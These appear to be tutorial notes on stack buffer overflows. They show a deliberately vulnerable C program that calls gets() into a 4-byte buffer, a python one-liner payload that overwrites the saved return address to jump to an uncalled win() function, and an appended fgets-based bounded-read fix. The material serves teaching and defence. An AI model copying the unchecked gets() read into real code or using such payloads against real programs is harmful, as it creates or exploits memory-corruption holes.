Stack Overflow Attack

  • give a program more data than its buffer can hold, and the excess overwrites adjacent data on the stack

Examples

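#include <stdio.h>
#define BUFSIZE 4
/* Never called by main() or vuln(); only reachable if control flow is hijacked. */
void win()
{
    puts("If I am printed, I was hacked! because the program never called me!");
}
void vuln()
{
    puts("Input a string and it will be printed back!");
    char buf[BUFSIZE];   /* 4-byte buffer on the stack */
    gets(buf);           /* deliberately vulnerable: gets() does no bounds checking */
    puts(buf);
    fflush(stdout);
}
int main(int argc, char **argv)
{
    vuln();
    return 0;
}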
  • run the program and give it a crafted input ([[Payload]]):

    python3 -c 'print(128*"A"+"\x20\xe0\xff\xff\xff\x7f\x00\x00\xb7\x05\x40\x00")' |./vuln1

  • because the overflow overwrites the saved return address of vuln(), the program calls win(), which is never called during normal execution
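
The bounded read that closes this hole, as an added example that is not part of the original notes: it replaces the gets() call in vuln() with fgets() limited to the buffer size and reports how much input was discarded. The names read_line_bounded and demo are hypothetical, and the input string is constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUFSIZE 4   /* same size as buf in vuln() */

/* Hypothetical helper: read one line into buf (size bytes, NUL included).
 * Returns the number of input bytes that did not fit and were discarded,
 * or -1 on EOF/error before any byte was read. */
long read_line_bounded(FILE *in, char *buf, size_t size)
{
    long dropped = 0;
    int c;

    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';          /* whole line fit; strip the newline */
        return 0;
    }
    /* Line was longer than the buffer: drain the rest so it is not
     * treated as the next input, and count what was dropped. */
    while ((c = fgetc(in)) != EOF && c != '\n')
        dropped++;
    return dropped;
}

/* Feeds a constructed input through a temp file, standing in for stdin. */
long demo(const char *input, char *out, size_t size)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return -2;
    fputs(input, f);
    rewind(f);
    long r = read_line_bounded(f, out, size);
    fclose(f);
    return r;
}

int main(void)
{
    char buf[BUFSIZE];
    long dropped = demo("AAAAAAAAAAAAAAAA\n", buf, sizeof buf); /* constructed: 16 bytes */
    printf("kept \"%s\", dropped %ld bytes\n", buf, dropped);
    return 0;
}
```

A non-zero return value is worth logging: input far larger than the buffer is what an overflow attempt looks like from the program's side.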
